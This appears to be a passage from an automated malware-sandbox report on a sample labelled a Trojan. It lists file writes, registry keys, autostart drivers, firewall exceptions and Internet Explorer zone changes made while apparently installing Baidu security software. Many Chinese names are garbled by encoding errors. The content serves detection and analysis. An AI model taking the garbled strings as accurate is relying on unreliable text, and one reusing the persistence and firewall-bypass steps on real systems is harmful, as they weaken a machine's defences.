%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\hips_customer.xml (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\cache_config.dat (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\wverify.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu16.tmp (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMFrameWork.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\ns19.tmp (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMReport.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\skin_engine.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.1.xml (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.5.xml (0 bytes)
The process %original file name%.exe:716 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
The Trojan deletes the following file(s):
The process BaiduSdTray.exe:2844 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings% (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\CachedDB_1\LOG (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd (4 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086 (288 bytes)
%WinDir%\SoftwareDistribution\DataStore\Logs (96 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\902.dat (4 bytes)
%WinDir%\repair (4 bytes)
%Documents and Settings%\All Users\APPLICATION DATA (4 bytes)
%Program Files%\WIRESHARK (192 bytes)
%WinDir%\WinSxS (8 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\index.dat (632 bytes)
%WinDir%\SoftwareDistribution (4 bytes)
%WinDir%\$hf_mig$ (96 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\900.dat (12 bytes)
%WinDir%\WinSxS\Manifests (1444 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wireshark.txt (12074 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\FileSignDB\LOG (4 bytes)
%WinDir%\Help (248 bytes)
%WinDir%\ime (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\CachedDB_1 (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\FileSignDB\LOG (4 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch (4 bytes)
%WinDir%\Prefetch\NETSH.EXE-085CFFDE.pf (24 bytes)
%Documents and Settings%\All Users (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp (4 bytes)
%WinDir% (1060 bytes)
%Documents and Settings%\All Users\Documents\My Music (4 bytes)
C:\$Directory (1388 bytes)
%System% (552 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\BaiduSdCache.rptc (102 bytes)
%WinDir%\Microsoft.NET\Framework\v4.0.30319 (1440 bytes)
%WinDir%\Microsoft.NET\Framework\V2.0.50727 (1444 bytes)
%WinDir%\Fonts (4 bytes)
%System%\config\systemprofile (4 bytes)
%Program Files%\COMMON FILES (4 bytes)
C:\ (4 bytes)
%Documents and Settings%\All Users\Start Menu\Programs (4 bytes)
%System%\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE} (4 bytes)
%Program Files% (8 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667 (12 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\FileSignDB (4 bytes)
%Documents and Settings%\%current user% (4 bytes)
%WinDir%\Prefetch\REGSVR32.EXE-25EEFE2F.pf (48 bytes)
%Documents and Settings%\%current user%\APPLICATION DATA (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips (4 bytes)
%WinDir%\pchealth\helpctr (4 bytes)
%System%\drivers (4 bytes)
%Documents and Settings%\All Users\Start Menu (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\FileSignDB\000003.log (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\G1023_s_70904[1].exe (1040 bytes)
%Program Files%\Adobe\Reader 9.0 (4 bytes)
%WinDir%\Prefetch (192 bytes)
%System%\wbem\Logs\wbemcore.log (576 bytes)
C:\totalcmd (4 bytes)
%System%\CatRoot2 (96 bytes)
%System%\wbem\Repository\FS\INDEX.BTR (608 bytes)
%Program Files%\Common Files\VMware\Drivers (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\CachedDB_1\LOG (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\G1023_s_70904.exe (17531 bytes)
%WinDir%\MICROSOFT.NET (4 bytes)
%Program Files%\Adobe\Reader 9.0\Reader (192 bytes)
%WinDir%\Microsoft.NET\Framework (96 bytes)
%WinDir%\assembly (4 bytes)
%Documents and Settings%\Default User (56 bytes)
%System%\oobe (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\CachedDB_1 (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\FileSignDB (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\CachedDB_1\000003.log (4 bytes)
%Documents and Settings%\LocalService (4 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\BaiduSdCache.rptc (0 bytes)
The process setup.exe:1056 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-LEFTL.tmp\setup.tmp (3779 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-LEFTL.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-LEFTL.tmp\setup.tmp (0 bytes)
The process BindEx.exe:1568 makes changes in the file system.
The Trojan deletes the following file(s):
%Documents and Settings%\All Users\Desktop\百度å«士.lnk (0 bytes)
%Documents and Settings%\All Users\Desktop\百度æÂ€毒.lnk (0 bytes)
The process BindEx.exe:1040 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\G1023_s_70904[1].exe (5514955 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\F1023_s_30803.exe (4443178 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\test[1].txt (130 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\dlinstlit.txt (130 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\F1023_s_30803[1].exe (4700638 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\G1023_s_70904.exe (4688535 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
The process setup.tmp:1976 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\baidu\is-39O9G.tmp (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-CCSRF.tmp\_isetup\_shfoldr.dll (23 bytes)
%Program Files%\baidu\unins000.dat (932 bytes)
%Program Files%\baidu\is-RG24O.tmp (25913 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\baidu\baidu.lnk (479 bytes)
%Program Files%\baidu\BindEx.ini (65 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-CCSRF.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-CCSRF.tmp\_isetup\_shfoldr.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-CCSRF.tmp\_isetup (0 bytes)
The process BDALeakfixer.exe:3188 makes changes in the file system.
The Trojan deletes the following file(s):
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\BaiduAnCache.rptc (0 bytes)
The process BaiduAn.exe:3824 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Desktop\百度å«士-软件管ç†.lnk (866 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\百度å«士\百度å«士-软件管ç†.lnk (878 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\SWManager\百度å«士-软件管ç†.lnk (882 bytes)
The process BaiduAnSvc.exe:3664 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\config\system (4180 bytes)
%System%\config\software (3256 bytes)
%System%\config\SOFTWARE.LOG (4483 bytes)
%System%\drivers\BDEnhanceBoost.sys (61 bytes)
%System%\config (400 bytes)
%System%\config\SYSTEM.LOG (9458 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\MANIFEST-000002 (4 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\CURRENT (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\MANIFEST-000001 (0 bytes)
The process BaiduSdSvc.exe:1500 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\FileSignDB\MANIFEST-000002 (4 bytes)
%System%\config\SYSTEM.LOG (13860 bytes)
%System%\config\software (28594 bytes)
%System%\config\SOFTWARE.LOG (29161 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\IsolationDB.db-journal (532 bytes)
%System%\drivers\BDMWrench.sys (1882 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\privacy.db-journal (532 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\BaiduSdCache.rptc (2412 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\white_list.db (145 bytes)
%System%\config (976 bytes)
%System%\config\system (6592 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\CachedDB_1\MANIFEST-000002 (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\privacy.db (149 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\IsolationDB.db (149 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\white_list.db-journal (512 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\FileSignDB\MANIFEST-000001 (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\FileSignDB\CURRENT (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\BaiduSdCache.rptc (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\IsolationDB.db-journal (0 bytes)
%System%\drivers\BDMWrench.sys (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\privacy.db-journal (0 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\drivers\BDMWrench.sys (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\CachedDB_1\CURRENT (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\CachedDB_1\MANIFEST-000001 (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\white_list.db-journal (0 bytes)
Registry activity
The process F1023_s_30803.exe:780 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Baidu\BaiduSd]
"InstallDate" = "2014-11-6"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\百度æÂ€毒]
"UninstallString" = "%Program Files%\Baidu\BaiduSd\2.1.0.3086\uninst.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\SOFTWARE\Baidu\BaiduSd]
"Version" = "2.1.0.3086"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\百度æÂ€毒]
"DisplayVersion" = "2.1.0.3086"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{36E6A19A-6C8C-4250-B42A-24B8D3514ABA}\iexplore\AllowedDomains\*]
"(Default)" = ""
[HKLM\SOFTWARE\MozillaPlugins\@baidu.com/BaidusdDetectNPPlugin]
"vendor" = "Beijing baidu Netcom science and technology co.ltd"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Services\bd0003]
"Description" = "百度æÂ€毒功能组件"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\百度æÂ€毒]
"Publisher" = "百度在线网络技术(åŒâ€â€ÃƒÂ¤Ã‚ºÂ¬Ã¯Â¼â€°Ã¦Å“䎪ÂÂå…¬å¸"
[HKLM\System\CurrentControlSet\Services\bd0001]
"Type" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Services\bd0002]
"Tag" = "2"
[HKLM\System\CurrentControlSet\Services\bd0003\Instances\bd0003 Instance]
"Altitude" = "326912"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\System\CurrentControlSet\Services\BDArKit]
"Tag" = "4"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsk3.tmp\BDMSkin.dll,"
[HKLM\System\CurrentControlSet\Services\bd0002]
"InstallDir_hips" = "%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667"
[HKLM\System\CurrentControlSet\Services\BDArKit]
"ErrorControl" = "0"
[HKLM\System\CurrentControlSet\Services\bd0003]
"Group" = "FSFilter Anti-Virus"
[HKLM\System\CurrentControlSet\Services\BDArKit]
"Description" = "BDArKit"
[HKLM\SOFTWARE\Baidu\BaiduHips]
"Version" = "1.0.0.667"
[HKLM\System\CurrentControlSet\Services\bd0002]
"Type" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\MozillaPlugins\@baidu.com/BaidusdDetectNPPlugin\MimeTypes\application/np-BaiduSDDetect]
"Description" = "BaidusdDetectNPPlugin"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\System\CurrentControlSet\Services\bd0003\Instances]
"DefaultInstance" = "bd0003 Instance"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKLM\SOFTWARE\Baidu\BaiduSd]
"InstallDir" = "%Program Files%\Baidu\BaiduSd"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "01 A6 F1 79 C5 C6 86 18 7C 1E 55 46 42 4F 3A 82"
[HKLM\System\CurrentControlSet\Services\bd0001]
"DisplayName" = "bd0001"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Services\bd0003]
"DependOnService" = "FltMgr"
[HKLM\System\CurrentControlSet\Services\BaiduHips]
"Tag" = "1"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\Common Files\Baidu\BDDownload\108]
"bddownloader.exe" = "百度高速下载引擎"
[HKLM\SOFTWARE\Baidu\BaiduHips]
"InstallPath" = "%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BaiduHips.exe"
[HKLM\System\CurrentControlSet\Services\BDArKit]
"Group" = "bddriver"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\System\CurrentControlSet\Services\BaiduHips]
"Group" = "bdsvcorder"
[HKLM\System\CurrentControlSet\Services\bd0003]
"ImagePath" = "system32\DRIVERS\bd0003.sys"
[HKLM\System\CurrentControlSet\Services\bd0001]
"Tag" = "1"
[HKLM\System\CurrentControlSet\Services\BDArKit]
"ImagePath" = "system32\DRIVERS\BDArKit.sys"
[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"bdsvcorder" = "04 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00"
[HKLM\System\CurrentControlSet\Services\bd0002]
"DisplayName" = "bd0002"
[HKLM\System\CurrentControlSet\Services\bd0003]
"Type" = "2"
[HKLM\System\CurrentControlSet\Services\bd0002]
"ErrorControl" = "0"
[HKLM\SOFTWARE\Baidu\BaiduSd]
"RtpFlag" = "273"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\System\CurrentControlSet\Services\bd0002]
"Group" = "bddriver"
[HKLM\System\CurrentControlSet\Services\bd0001]
"ImagePath" = "system32\DRIVERS\bd0001.sys"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\百度æÂ€毒]
"DisplayIcon" = "%Program Files%\Baidu\BaiduSd\2.1.0.3086\app.ico"
[HKLM\System\CurrentControlSet\Services\bd0003]
"Tag" = "3"
[HKLM\SOFTWARE\MozillaPlugins\@baidu.com/BaidusdDetectNPPlugin]
"Path" = "%Program Files%\Baidu\BaiduSd\2.1.0.3086\explugin\npBaiduSDDetectPlug.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\百度æÂ€毒]
"DisplayName" = "百度æÂ€毒2.1"
[HKLM\SOFTWARE\Baidu\BaiduSd]
"VirusTime" = "2013.11.28 0110"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Services\bd0001]
"ErrorControl" = "0"
[HKLM\SOFTWARE\Baidu\BaiduHips]
"InstallDir" = "%Program Files%\Common Files\Baidu\BaiduHips"
[HKLM\System\CurrentControlSet\Services\bd0002]
"Description" = "bd0002"
[HKLM\System\CurrentControlSet\Services\BDArKit]
"Type" = "1"
[HKLM\System\CurrentControlSet\Services\bd0003]
"ErrorControl" = "1"
[HKLM\System\CurrentControlSet\Services\bd0002]
"ImagePath" = "system32\DRIVERS\bd0002.sys"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Baidu\BaiduSd]
"INSTLANG" = "2052"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"bddriver" = "02 00 00 00 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\MozillaPlugins\@baidu.com/BaidusdDetectNPPlugin]
"ProductName" = "BaiduSd"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\System\CurrentControlSet\Services\BDArKit]
"DisplayName" = "BDArKit"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\MozillaPlugins\@baidu.com/BaidusdDetectNPPlugin]
"Description" = "Baidusd detect NPAPI plugin"
[HKLM\System\CurrentControlSet\Control\ServiceGroupOrder]
"List" = "System Reserved, Boot Bus Extender, System Bus Extender, SCSI miniport, Port, Primary Disk, SCSI Class, SCSI CDROM Class, FSFilter Infrastructure, FSFilter System, FSFilter Bottom, FSFilter Copy Protection, FSFilter Security Enhancer, FSFilter Open File, FSFilter Physical Quota Management, FSFilter Encryption, FSFilter Compression, FSFilter HSM, FSFilter Cluster File System, FSFilter System Recovery, FSFilter Quota Management, FSFilter Content Screener, FSFilter Continuous Backup, FSFilter Replication, bddriver, FSFilter Anti-Virus, FSFilter Undelete, FSFilter Activity Monitor, FSFilter Top, Filter, Boot File System, Base, Pointer Port, Keyboard Port, Pointer Class, Keyboard Class, Video Init, Video, Video Save, File System, Event Log, Streams Drivers, NDIS Wrapper, COM Infrastructure, UIGroup, LocalValidation, PlugPlay, PNP_TDI, NDIS, TDI, NetBIOSGroup, ShellSvcGroup, SchedulerGroup, SpoolerGroup, AudioGroup, SmartCardGroup, NetworkProvider, RemoteValidation, NetDDEGroup, Parallel arbitrator, Extended Base, PCI Configuration, MS Transactions"
[HKLM\System\CurrentControlSet\Services\bd0001]
"Description" = "bd0001"
"Group" = "bddriver"
[HKLM\System\CurrentControlSet\Services\bd0003\Instances\bd0003 Instance]
"Flags" = "0"
[HKLM\SOFTWARE\MozillaPlugins\@baidu.com/BaidusdDetectNPPlugin]
"Version" = "1.0.0.1"
[HKLM\System\CurrentControlSet\Services\bd0003]
"DisplayName" = "bd0003"
[HKLM\SOFTWARE\Baidu\BaiduSd]
"SupplyID" = "30803"
The Trojan adds process executable file it works in to the list of trusted Windows Firewall applications:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Program Files%\baidu\BaiduSd\2.1.0.3086]
"BaiduSdBugRpt.exe" = "%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdBugRpt.exe:*:Enabled:百度æÂ€毒BUG上报程åºÂÂ"
Adds a rule to the firewall Windows which allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\Common Files\Baidu\BDDownload\108]
"bddownloader.exe" = "%Program Files%\Common Files\Baidu\BDDownload\108\bddownloader.exe:*:Enabled:百度高速下载器"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The following driver will be automatically launched by the NT Native code (IoInitSystem method):
[HKLM\System\CurrentControlSet\Services\bd0003]
"Start" = "1"
Adds a rule to the firewall Windows which allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\baidu\BaiduSd\2.1.0.3086]
"BaiduSdBugRpt.exe" = "%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdBugRpt.exe:*:Enabled:百度æÂ€毒BUG上报程åºÂÂ"
"BaiduSd.exe" = "%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSd.exe:*:Enabled:百度æÂ€毒主程åºÂÂ"
"BaiduSdTray.exe" = "%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdTray.exe:*:Enabled:百度æÂ€毒托盘程åºÂÂ"
The Trojan adds process executable file it works in to the list of trusted Windows Firewall applications:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Program Files%\baidu\BaiduSd\2.1.0.3086]
"BaiduSdTray.exe" = "%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdTray.exe:*:Enabled:百度æÂ€毒托盘程åºÂÂ"
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Program Files%\Common Files\Baidu\BDDownload\108]
"bddownloader.exe" = "%Program Files%\Common Files\Baidu\BDDownload\108\bddownloader.exe:*:Enabled:百度高速下载器"
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Program Files%\baidu\BaiduSd\2.1.0.3086]
"BaiduSdSvc.exe" = "%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdSvc.exe:*:Enabled:百度æÂ€毒æœÂÂ务程åºÂÂ"
The following service will be launched automatically at system boot up:
[HKLM\System\CurrentControlSet\Services\BDArKit]
"Start" = "2"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
Adds a rule to the firewall Windows which allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\baidu\BaiduSd\2.1.0.3086]
"BaiduSdUpdate.exe" = "%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdUpdate.exe:*:Enabled:百度æÂ€毒更新程åºÂÂ"
The following driver will be automatically launched by the NT Native code (IoInitSystem method):
[HKLM\System\CurrentControlSet\Services\bd0002]
"Start" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The following driver will be automatically launched by the NT Native code (IoInitSystem method):
[HKLM\System\CurrentControlSet\Services\bd0001]
"Start" = "1"
The Trojan adds process executable file it works in to the list of trusted Windows Firewall applications:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Program Files%\baidu\BaiduSd\2.1.0.3086]
"BaiduSdUpdate.exe" = "%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdUpdate.exe:*:Enabled:百度æÂ€毒更新程åºÂÂ"
"BaiduSd.exe" = "%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSd.exe:*:Enabled:百度æÂ€毒主程åºÂÂ"
Adds a rule to the firewall Windows which allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\baidu\BaiduSd\2.1.0.3086]
"BaiduSdSvc.exe" = "%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdSvc.exe:*:Enabled:百度æÂ€毒æœÂÂ务程åºÂÂ"
The Trojan deletes the following value(s) in system registry:
[HKLM\System\CurrentControlSet\Services\bd0003]
"DeleteFlag"
[HKLM\System\CurrentControlSet\Services\bd0002]
"DeleteFlag"
[HKLM\System\CurrentControlSet\Services\bd0001]
"DeleteFlag"
[HKLM\System\CurrentControlSet\Services\BDArKit]
"DeleteFlag"
[HKLM\SOFTWARE\Baidu\BaiduSd]
"RtpFlag"
The process BaiduHips.exe:3260 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Services\bd0002]
"Description" = "bd0002"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\System\CurrentControlSet\Services\bd0002]
"Type" = "1"
"ImagePath" = "system32\DRIVERS\bd0002.sys"
[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"bddriver" = "02 00 00 00 01 00 00 00 02 00 00 00"
[HKLM\System\CurrentControlSet\Services\bd0001]
"Tag" = "1"
[HKLM\System\CurrentControlSet\Services\bd0002]
"DisplayName" = "bd0002"
[HKLM\System\CurrentControlSet\Services\bd0001]
"Type" = "1"
[HKLM\System\CurrentControlSet\Services\bd0002]
"ErrorControl" = "0"
"Group" = "bddriver"
"Tag" = "2"
[HKLM\System\CurrentControlSet\Services\bd0001]
"ImagePath" = "system32\DRIVERS\bd0001.sys"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A7 42 BA 68 E6 D6 5D 88 94 D2 31 53 4B F7 B6 49"
[HKLM\System\CurrentControlSet\Services\bd0001]
"Group" = "bddriver"
"DisplayName" = "bd0001"
[HKLM\System\CurrentControlSet\Control\Session Manager]
